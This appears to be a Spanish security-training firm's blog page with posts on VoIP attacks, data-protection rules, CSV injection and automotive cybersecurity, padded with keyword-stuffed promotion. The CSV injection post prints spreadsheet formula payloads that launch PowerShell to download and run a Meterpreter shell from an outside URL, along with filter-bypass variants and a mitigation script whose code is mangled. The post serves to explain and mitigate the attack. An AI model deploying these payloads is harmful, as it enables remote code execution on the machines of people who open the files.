This is default featured slide 1 title

International Institute Cyber Security Mexico provides training for all type of data security.

This is default featured slide 2 title

Webiprints is one of the world famoous company for data security provider in world wide at lowest price with 100% secure.

This is default featured slide 3 title

Webiprints offers Mobile application development services at affordable price and also Mobile Hacking Course. Just visit our website and fill up your query.

This is default featured slide 4 title

Grow your business with us! We offers Digital Marketing including services such as SEO, SMO and PPC.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Wednesday, 31 August 2016

DIFERENTES FORMAS DE ATACAR Y ASEGURAR LAS REDES TELEFÓNICAS DE VOIP

Las redes VoIP son vulnerables a muchas formas de ataques comunes en las redes y los dispositivos compatibles con estas infraestructuras también son vulnerables a problemas similares. Incluso si se toman todas las precauciones de seguridad en redes informáticas, el servidor sigue siendo susceptible a ataques. La seguridad en redes informáticas está siempre en una batalla con la conveniencia. Soluciones de seguridad en redes informáticas como escaneo de vulnerabilidades y otros que hacen que los sistemas sean más seguros también los hacen menos convenientes. Esperamos que este post te vaya a ayudar a darle sentido a prevenir la mayoría de los ataques y mitigar la pérdida si por alguna razón, tu seguridad falla.

AQUÍ HAY DIFERENTES MANERAS DE HACER EL ATAQUE DE VOIP:


SIP Escaneo y fuerza bruta – las violaciones de SIP escaneo y fuerza bruta se producen cuando los objetivos SIP usando INVITE, REGISTER y OPTIONS, señalan mensajes para enumerar los nombres de usuario SIP válidos con el objetivo de secuestrar ese dispositivo.

Los ataques TFTP – Los sistemas de infraestructura son la columna vertebral de la comunicación de voz. Estos aparatos, ya sea hardware o software, pueden ser atacados al igual que cualquier otra tecnología de TCP / IP puede ser atacada. Por ejemplo, un vulnerable router de Cisco corriendo TFTP no es muy diferente que un teléfono Cisco IP corriendo TFTP. Ambos dispositivos son vulnerables a todos los ataques contra seguridad en redes informáticas que caen bajo el ataque de TFTP.


Vulnerabilidades del teléfono – La vulnerabilidad del teléfono sigue siendo una de las maneras más fáciles para los estafadores para obtener acceso a su red, pero también es una de las contramedidas más fáciles utilizadas también. Independientemente de su fabricante del teléfono, cualquier tipo de teléfono viene con problemas de seguridad en redes informáticas. Un problema de seguridad es cuando el nombre de usuario y contraseña por defecto de fábrica no se cambian. Esta es la forma más sencilla para los estafadores para obtener de forma anónima el acceso a la red según escaneo de vulnerabilidades.

Ataques de señalización – Session Initiation Protocol (SIP) se ha convertido en el protocolo de control de llamadas para las redes VoIP, debido a su naturaleza abierta y extensible. Sin embargo, la integridad de la señalización entre los sitios de llamadas es de suma importancia y SIP es vulnerable a los atacantes cuando se deja sin seguridad en redes informáticas. Secure SIP es un mecanismo de seguridad definido por el RFC 3261 SIP para enviar mensajes SIP a través de un canal cifrado. Los administradores de red no se ven en la implementación de esta tecnología dentro de sus redes basadas en SIP y no hacen escaneo de vulnerabilidades por lo tanto seguirá siendo insegura.

Vulnerabilidades de la interfaz web PBX – Otras áreas que desearas bloquear son PBX y las interfaces de administración, así como acceso a una consola. Interfaces administrativas (tales como Webmin o FreePBX / Trixbox GUI), así como el acceso directo de shell (SSH o Telnet) son agujeros de seguridad en redes informáticas. La forma más fácil de manejar la seguridad en redes informáticas es bloquear todos y cada uno fuera el tráfico para llegar a ellos. Ya sea a través de firewall/ ACL depende de ti. Como mínimo, se debe bloquear todo excepto las direcciones IP específicas con las que manejes el sistema con frecuencia desde en una “lista de permitidos.” Independientemente de si está o no está bloqueando estas interfaces, también debe tener un nombre de usuario / contraseña segura para todo según expertos de escaneo de vulnerabilidades quien trabajan en International Institute of Cyber Security IICS.

User Extensions – Una de las formas más comunes de irrumpir en un interruptor es también el más simple; es decir, atacando una user Extensions en el sistema telefónico. El ‘hacker consigue de alguna manera el nombre de usuario y la contraseña de un user/extension del interruptor y comienza a enviar tráfico. La causa raíz más frecuente son contraseñas inseguras. La gran cosa acerca de las contraseñas de usuario SIP es que usted realmente debe sólo tiene que escribirla una vez (durante la configuración del cliente). Lo mejor que puede hacer es utilizar un generador de contraseñas al azar en línea o hacer escaneo de vulnerabilidades regularmente. El uso de las contraseñas generadas aleatoriamente disminuye en gran medida la posibilidad de que la contraseña sea “adivinada” ya sea por un ataque de fuerza bruta o posible ataque de ingeniería social.
Hay algunos programas de escaneo de vulnerabilidades y sitios con programas que permiten poner a prueba su seguridad en redes informáticas y los servidores SIP disponibles en Internet. Estos pueden ayudarle a encontrar exactamente dónde eres más vulnerable y ayudar a dirigir su atención cuando se trata de proteger la red.

Una vez que se establece seguridad en redes informáticas, saber lo que está pasando en tu red es la siguiente gran parte de la batalla. Por lo menos, los informes diarios sobre el uso te darán una idea de lo que está pasando y te ahorrará muchos dolores de cabeza en el futuro. Este informe de escaneo de vulnerabilidades no tiene que ser granular, pero puede ser un panorama que te guiará en la comprensión de tus vulnerabilidades de seguridad en redes informáticas. La seguridad de VoIP definitivamente debe tener un enfoque proactivo para tener éxito.


Monday, 29 August 2016

DIEZ REGLAS PARA LA PROTECCIÓN DE DATOS PERSONALES

 Seguridad de datos personales es un tema muy importante para empresas. Las empresas siempre deben seguir reglas básicas para seguridad de datos personales.


1. CONSENTIMIENTO

Siempre que sea posible obtener el consentimiento antes de la adquisición, posesión o el uso de datos personales. Según reglas de protección de datos personales, cualquier formulario, ya sea en papel o basado en web, quienes están diseñados para recopilar datos personales deben contener una declaración explicando qué es la información que se utilizará para y quién puede ser revelada.

2. DATOS CONFIDENCIALES

Tenga especial cuidado con los datos personales confidenciales (es decir, información relacionada con la raza, opinión política, la salud física o mental, las creencias religiosas, afiliación sindical, la sexualidad, delitos, etc.). Acuerdo a recomendaciones de empresa de adaptación LOPD International Institute of Cyber Security IICS, dicha información sólo debe mantenerse y utilizarse cuando sea estrictamente necesario. Siempre obtener el consentimiento de la persona en cuestión y notificarles de que existe uso probable (s) de estos datos.


3. LOS DERECHOS INDIVIDUALES

Siempre que sea posible se abierto con las personas en relación con la información que se llevan a cabo sobre ellos para asegurar protección de datos personales. En la preparación de informes o de agregar notas a los documentos oficiales, tenga en cuenta que los individuos tienen el derecho de ver todos los datos personales y por lo tanto podrían leer los comentarios ‘informales’ hechos por ellos. También tenga en cuenta que esto incluye los correos electrónicos que contienen datos de carácter personal y así mismo se debe tener precaución cuando se envían correos electrónicos.

4. LOS ARCHIVOS DE REVISIÓN

Sólo crear y conservar los datos personales cuando sea absolutamente necesario ya que seguridad de datos personales es muy importante. De forma segura disponer o eliminar cualquier dato personal que no esté actualizado, irrelevantes o que no necesite. Acuerdo a recomendaciones deempresa de adaptación LOPD deben realizar exámenes regulares de los archivos y desechar los datos innecesarios u obsoletos de forma sistemática.

5. ELIMINACIÓN DE LOS REGISTROS

Para mantener seguridad de dataos personales, cuando se deshaga de los registros en papel que contienen datos personales, tratarlos con confidencialidad (es decir desmenuza este tipo de archivos en lugar de disponer de ellos como papel de desecho). Del mismo modo cualquiera innecesario o fuera de la fecha de los documentos electrónicos deben suprimirse. Otro punto muy crítico para protección de datos personales es que los equipos de negocios no deben ser regalados o vendidos a menos que los servicios de información se han asegurado de que toda la información almacenada en él se ha eliminado o borrado.

6. PRECISIÓN

Mantenga todos los datos personales actualizados y precisos. Tenga en cuenta los cambios de dirección y otras modificaciones. Si hay alguna duda sobre la exactitud de los datos personales, entonces no deberían ser utilizados explica experto de una empresa de adaptación LOPD.

7. SEGURIDAD

Mantenga todos los datos personales de forma segura como sea posible (por ejemplo, en archivadores con llave o en habitaciones que se puede bloquear cuando estén desocupadas). Para mantener seguridad de dataos personales, no deje los registros que contengan datos de carácter personal sin vigilancia en oficinas o áreas accesibles a los miembros del público. Asegúrese de que los datos personales no se muestran en las pantallas de los ordenadores visibles para los transeúntes. Tenga en cuenta que estas consideraciones de seguridad también se aplican a los registros tomados fuera de la empresa, por ejemplo, para el trabajo en casa o para una reunión fuera. También tener en cuenta que el correo electrónico no es necesariamente confidencial para protección de datos personales o asegurar así que no debe ser utilizado para las comunicaciones potencialmente sensibles.

8. LA REVELACIÓN DE DATOS

Nunca revele datos personales a terceros sin el consentimiento de la justificación razonable de otro individuo explica experto de una empresa de adaptación LOPD. Esto incluye los padres, tutores, familiares y amigos de los datos del sujeto quienes no tienen derecho a acceder a la información sin el consentimiento del interesado. Los datos personales sólo pueden comunicarse legítimamente a terceros para fines relacionados y para cumplir con los requisitos legales de protección de datos personales, pero sólo en los que se conforman con las solicitudes de información de identidad ‘y la legitimidad de la solicitud.
Las solicitudes de información personal se reciben de vez en cuando de organizaciones tales como la policía y el gobierno. Las empresas deben esforzarse por cooperar con estas organizaciones, pero los primeros pasos se deben tomar son asegurarse de que las solicitudes son genuinas y legítimas.

9. TRANSFERENCIA DE TODO EL MUNDO

Siempre debes obtener el consentimiento de la persona de que se trate antes de colocar la información sobre ellos en Internet (aparte de los detalles básicos del contacto de oficina) y antes de enviar cualquier información personal fuera del país acuerdo a recomendaciones de iicybersecurity, una empresa de adaptación LOPD.

10. PROCESADORES TERCEROS

Tenga en cuenta que si está utilizando un procesador de datos, por ejemplo, a un tercer partido para gestión de base de datos y se les da acceso a los datos personales, entonces usted debe tener un contrato escrito en marcha con ellos para garantizar que ellos tratan a dicha información con confidencialidad, tienen medidas de seguridad de datos personales y en cumplimiento de la ley de protección de datos personales.
Podrían aprender más sobre protección de datos personales, medidas de seguridad de datos personales con ayuda de expertos de empresas de adaptación LOPD.


Saturday, 27 August 2016

¿CÓMO MITIGAR UN ATAQUE DE INYECCIÓN CSV?

Los expertos de seguridad web mencionan que un atacante puede explotar esta funcionalidad mediante la inserción de caracteres arbitrarios en formas que sean exportables (sea esto a través de un análisis, contactos u otras funcionalidades). Permitiendo en consecuencia, a dicho atacante pueda formular una carga útil de ataque que se ejecuta cuando dicho archivo CSV se descarga y podría romper seguridad perimetral.
El escenario de este ataque se dirige  puramente al usuario (s) que descarga el archivo CSV, naturalmente, este ataque de seguridad web se suele descartar como un problema sin embargo sitios web todavía deben estar al tanto de la información que están exportando porque puede ser potencialmente perjudicial para seguridad perimetral de los usuarios.
El playload más común visto es similar a la que se muestra a continuación:
=cmd|’ /C calc’!A0
Esta cadena en su núcleo, le está diciendo esencialmente al programa que está abierto con el programa que le gustaría ejecutar cmd.exe con las siguientes banderas /C calc que a su vez pondrán en marcha calc.exe desde la línea de comandos.
Para formular un payload meterpreter en la víctima, hemos adaptado una cadena de payload para que sea más corto y más fácil de inyectar, como resultado, el siguiente payload se puede utilizar
=cmd|'/C powershell IEX(wget 0r.pe/p)'!A0
Donde en este caso url cortado 0r.pe es utilizado para entregar el payload para no ser detectado por seguridad perimetral(Invoke-Shellcode) que es una función de Powersploit para permitir la entrega de meterpreteshells. Para acortar el payload aún más la siguiente cadena también se puede utilizar, que corta la necesidad de la cadena de cmd.

=powershell|'IEX(wget 0r.pe/p)'!A0
                              
Esto directamente lanzará PowerShell desde la célula afectada en editor de hojas de cálculo de su elección. Estos payloads están todos muy bien y bien sin embargo, la  mayoría de las veces que no he estado viendo el = carácter está siendo filtrado hacia fuera menciona experto de seguridad web de iicybersecurity IICS.

Sin embargo, utilizando el conocimiento personal Microsoft Excel y seguridad web, también es posible intact el payload usando otras combinaciones de caracteres tales como @, + o – en una variedad de diferentes combinaciones.
@SUM(1+1)*cmd|’ /C calc’!A0
O para cuantificar el peligro:
@SUM(1+1)*cmd|' powershell IEX(wget 0r.pe/p)'!A0

Una vez dicho todo esto y hablado de los diversos payloads hay pasos de mitigación que se pueden tomar para eliminar más o menos la amenaza de secuencias de comandos PowerShell que infestan el sistema de un usuario con shells acuerdo a los expertos de seguridad web de International Institute of Cyber Security.

PASOS PARA LA MITIGACIÓN

Las medidas recomendadas para remediar este problema de seguridad web se han descrito anteriormente sería asegurar que las formulario que se pueden exportar si contengan únicamente caracteres alfanuméricos y no puedan ser modificados para añadir caracteres arbitrarios.
También se debe considerar que todas las entradas de los usuarios no pueden  ser de confianza y como resultado cualquier salida debe ser codificada. La salida de esta funcionalidad se debe asumir como texto y no fórmulas. Lo que podrían adoptarse medidas para designar fácilmente como tal al colocar las cotizaciones en todo el texto o la aplicación de características de escape como se describe y se demuestra a continuación según curso de seguridad perimetral.
El problema con los vectores de inyección CSV discutidos arriba no tiene en realidad que ver con el carácter @, o =, +, -. El problema radica en el carácter pipe (|), el cual Excel y otras aplicaciones interpretan para ejecutar comandos {arbitrarios} y windows lanza binarios. De la lectura de los ataques de seguridad web y la investigación de las posibles técnicas de mitigación con ayuda de expertos de seguridad perimetral que la mejor solución es escapar del carácter pipe en este escenario de ataque es poner un prefijo \ antes del pipe. Esto se debe a que  Excel y otros programas que buscan un ejecutable llamado  cmd.exe o powershell.exe sin embargo, cuando añadiendo un \ dentro de la trayectoria evitará el lanzamiento de exe.

Además también hemos escrito un script en Python para escapar de archivos CSV que se pueden ver a continuación, es una prueba rápida del concepto sin embargo se puede adaptar fácilmente:
def escape(payload):   
           if payload[0] in (‘@’,’+’,’-‘, ‘=’, ‘|’):           
                payload = payload.replace(“|”, “\|”)            
               payload = “‘” + payload + “‘”    
            return payload 
# An example of payload string payload
= “@cmd|’ /C calc’!A0”
print “The Unescaped version is: ” + payload
print “When passed though escape function the value is: ” +
escape(payload)

En el código anterior se puede observar que si una cadena de payload contiene cualquiera de los caracteres en la lista negra se han evitado el ataque, esto se demuestra en la salida del script:
root@zsec:# python escape_csv.py
El version Unescaped es:
“@cmd|’ /C calc’!A0”
When passed though escape function the value is: ‘@cmd\|’ /C calc’!A0′

Note que desde la salida se puede ver que la versión escapada tiene un conjunto de’ alrededor de la cadena de usuario y el carácter pipe también se ha escapado. Cabe señalar que los problemas descritos anteriormente son sólo un tipo de ataque de inyección CSV, esta mitigación no cubre los ataques sobre seguridad web que se pueden llevar a cabo utilizando la misma técnica pero con diferentes payloads.



Wednesday, 24 August 2016

MEJORES PRÁCTICAS DE CIBERSEGURIDAD PARA LA INDUSTRIA AUTOMOTRIZ

Hay diferentes áreas donde empresas de industria automotriz debe enfocar para no tener problemas con ciberseguridad. Este artículo explica las mejores prácticas en diferente área para la industria automotriz

GOBERNACIÓN

La gobernación efectiva se alinea a un programa de soluciones de ciberseguridad de vehículos con la misión y objetivos de una organización. Por otro lado, un sólido gobernación puede ayudar a fomentar y mantener una cultura de ciberseguridad. Las mejores prácticas no dictan un modelo particular de gobernación de soluciones de ciberseguridad de vehículos, pero proporcionan consideraciones para el diseño para alinear las funciones y responsabilidades funcionales. Mejores prácticas para la gobernación incluyen:
§  Definir la supervisión ejecutiva de la seguridad del producto con ayuda de empresa de ciberseguridad.
§  Alinear la empresa para abordar la ciberseguridad de vehículos, con funciones y responsabilidades definidas en el conjunto de la organización con ayuda de servicios de ciberseguridad.
§  Comunicar la responsabilidad de supervisar los servicios de ciberseguridad a todos los grupos de interés internos apropiados.
§  Dedicar recursos adecuados para las actividades y curso de ciberseguridad en toda la empresa.
§  Establecer procesos de gobernación para garantizar el cumplimiento de las regulaciones, políticas internas, y los compromisos externos.


EVALUACIÓN Y GESTIÓN DE RIESGOS

Evaluación del riesgo y estrategias de gestión para mitigar el impacto potencial de las vulnerabilidades de la ciberseguridad. Según expertos de soluciones de ciberseguridad, las mejores prácticas se centran en los procesos de identificación, categorización, priorización y el tratamiento de los riesgos de ciberseguridad que podrían llegar a problemas de seguridad y protección de datos. Los procesos de gestión de riesgos y servicios de ciberseguridad pueden ayudar a los fabricantes de automóviles a identificar y proteger los bienes críticos, ayudar en el desarrollo de medidas de protección, y apoyar las decisiones de riesgo operacional. Acuerdo acurso de ciberseguridad, mejores prácticas para la evaluación y gestión de riesgos incluyen:
§  Con ayuda de una empresa de ciberseguridad, establecer procesos estandarizados para identificar, medir, y dar prioridad a las fuentes de riesgo de ciberseguridad.
§  Establecer un proceso de decisión para gestionar los riesgos identificados.
§  Documentar de un proceso para informar y comunicar los riesgos a las partes interesadas apropiadas.
§  Monitorear y evaluar los cambios en los riesgos identificados como parte de un circuito de retroalimentación de evaluación de riesgos.
§  Incluir la cadena de suministro en las evaluaciones de riesgo y servicios de ciberseguridad.
§  Establecer un proceso para confirmar el cumplimiento de los proveedores críticos para verificar los requisitos de ciberseguridad, líneas de guía y curso de ciberseguridad.
§  Incluir una evaluación de riesgos en la etapa inicial de desarrollo del vehículo, y volver a evaluar en cada etapa del ciclo de vida del vehículo; explican maestros de iicybersecurity, una escuela de ciberseguridad.

SEGURIDAD EN DISEÑO

El diseño del vehículo seguro consiste en la integración de los recursos de hardware y soluciones de de ciberseguridad durante el proceso de desarrollo de productos. Según expertos de empresa de ciberseguridad, las mejores prácticas para la seguridad en diseño incluyen:
§  Considerar los riesgos de ciberseguridad desde el principio y en las etapas clave en el proceso de diseño.
§  Identificar y abordar las amenazas potenciales y objetivos de ataque en el proceso de diseño.
§  Usar servicios de ciberseguridad para considerar y comprender los métodos apropiados de reducción de la superficie de ataque.
§  Aprender implementar capas de defensas de ciberseguridad con curso de ciberseguridad para lograr una defensa en profundidad.
§  Identificar los límites de confianza y protegerlos mediante los controles de seguridad.
§  Incluir las revisiones de diseño de seguridad en el proceso de desarrollo.
§  Implementar las conexiones seguras hacía, desde y dentro del vehículo.
§  Limitar interacciones en la red con ayuda de separación de ambientes.
§  Según profesores de escuela de ciberseguridad es muy importante hacer pruebas de hardware y software para evaluar la integridad del producto y la seguridad como parte de las pruebas de componentes.
§  Tomar ayuda de expertos de una empresa de ciberseguridad para Llevar a cabo las pruebas de vulnerabilidad a nivel de software, incluyendo pruebas de unidad e integración.
§  Probar y validar soluciones de ciberseguridad implementado al nivel del vehículo.
§  Autenticar y validar todas las actualizaciones de software, independientemente del método de actualización.
§  Considere la posibilidad de riesgos contra privacidad de datos de acuerdo con los principios de protección de privacidad del consumidor.

DETECCIÓN DE AMENAZAS Y PROTECCIÓN

Ciberseguridad proactiva a través de la detección de amenazas, vulnerabilidades e incidentes permiten a los fabricantes de automóviles mitigar el riesgo y consecuencias asociadas. Los procesos de detección de amenazas crear conciencia de actividades sospechosas, lo que permite actividades de rehabilitación y recuperación proactivas. Según profesores de escuela de ciberseguridad, las mejores prácticas para la detección de amenazas y protección incluyen:
§  Según curso de ciberseguridad deben evaluar el riesgo y la disposición de las amenazas identificadas y las vulnerabilidades utilizando un proceso definido de conformidad con los procedimientos generales de gestión de riesgos.
§  Informar las decisiones basadas en el riesgo con la supervisión de las amenazas para reducir el riesgo de la empresa entendiendo y anticipando las amenazas actuales y emergentes.
§  Tomar ayuda de empresa de ciberseguridad para identificar las amenazas y vulnerabilidades a través de diversos medios, incluyendo la exploración y análisis de rutina de las áreas de mayor riesgo.
§  Apoyar la detección de anomalías para sistemas de operaciones, servicios de vehículos, y otras funciones conectadas, con consideraciones de privacidad.
§  La organización debe tener proceso para gestiona de la divulgación de vulnerabilidades de partes externas.
§  Usar servicios de ciberseguridad para informar sobre las amenazas y las vulnerabilidades a terceros.

RESPUESTA A INCIDENTES Y RECUPERACIÓN

Un plan de respuesta a incidentes documenta los procesos para informar a una respuesta a incidentes ciberseguridad que afecten el ecosistema del vehículo. Los expertos de soluciones de ciberseguridad mencionan que las mejores prácticas incluyen protocolos para recuperarse de incidentes de  ciberseguridad de una manera fiable y rápida, y la manera de garantizar el mejoramiento del proceso de continuo. Según empresa de ciberseguridad, las mejores prácticas para la respuesta a incidentes y recuperación incluyen:
§  Documentar el ciclo de vida de respuesta a incidentes, desde la identificación y contención a través de la rehabilitación y la recuperación.
§  Asegurar que un equipo de respuesta de incidentes este en su lugar para coordinar una respuesta de toda la empresa a un incidente cibernético al vehículo.
§  Mantener actualizado con curso de ciberseguridad y realizar pruebas y simulaciones de incidentes periódicamente para promover la preparación del equipo de respuesta a incidentes.
§  Tomar ayuda de servicios de ciberseguridad para identificar y validar en qué parte del vehículo un incidente se originó.
§  Determinar el impacto real y potencial de incidente cibernético al armada del vehículo.
§  Contener un incidente para eliminar o disminuir su gravedad.
§  Promover medidas oportunas y apropiadas para remediar un incidente cibernético vehículo.
§  Notificar a los interesados internos y externos de un incidente cibernético del vehículo.
§  Según profesores de escuela de ciberseguridad, mejorar los planes de respuesta a incidentes en el tiempo sobre la base de las lecciones aprendidas es muy importante.

FORMACIÓN Y SENSIBILIZACIÓN

Los programas de una escuela de ciberseguridad y curso de ciberseguridad ayudan a cultivar una cultura de seguridad y hacer cumplir las responsabilidades de seguridad cibernética del vehículo. Según empresa de ciberseguridad, las mejores prácticas deben incluir los programas de formación y de sensibilización en toda la organización para fortalecer el entendimiento de las partes interesadas de los riesgos de ciberseguridad. Según expertos de soluciones de ciberseguridad, las mejores prácticas de formación y sensibilización incluyen:
§  Establecer programas de curso de ciberseguridad para los interesados internos en todo el ecosistema del vehículo.
§  Incluir servicios de ciberseguridad y la conciencia de ciberseguridad específica para el vehículo.
§  Educar a los empleados en la conciencia de la ciberseguridad, las funciones y responsabilidades con ayuda de una escuela de ciberseguridad.

LA COLABORACIÓN CON TERCEROS

La defensa contra los ataques cibernéticos a menudo requiere de la colaboración entre múltiples partes interesadas para mejorar la conciencia sobre las amenazas cibernéticas, servicios de ciberseguridad y la respuesta a ataque cibernético. Según expertos de servicios de ciberseguridad, las mejores prácticas para la colaboración y el compromiso con Terceros incluyen:
§  Revisar la información y los datos mediante un proceso de clasificación estandarizado antes de la cesión a terceros.
§  Interactuar con organismos de la industria, tales como empresa de ciberseguridad, Auto-ISAC, Auto Alliance, los fabricantes de automóviles globales, y otros.
§  Interactuar con los organismos gubernamentales, incluyendo el National Highway Traffic Safety Administration, NIST, Department of Homeland Security, United States Computer Emergency Readiness Team, Federal Bureau of Investigation y otros.
§  Participar con las instituciones académicas como International Institute of Cyber Security,una escuela de ciberseguridad y los investigadores de soluciones de ciberseguridad, que sirven como un recurso adicional en la identificación y mitigación de amenazas.
§  Formar alianzas y acuerdos de colaboración para mejorar la ciberseguridad del vehículo.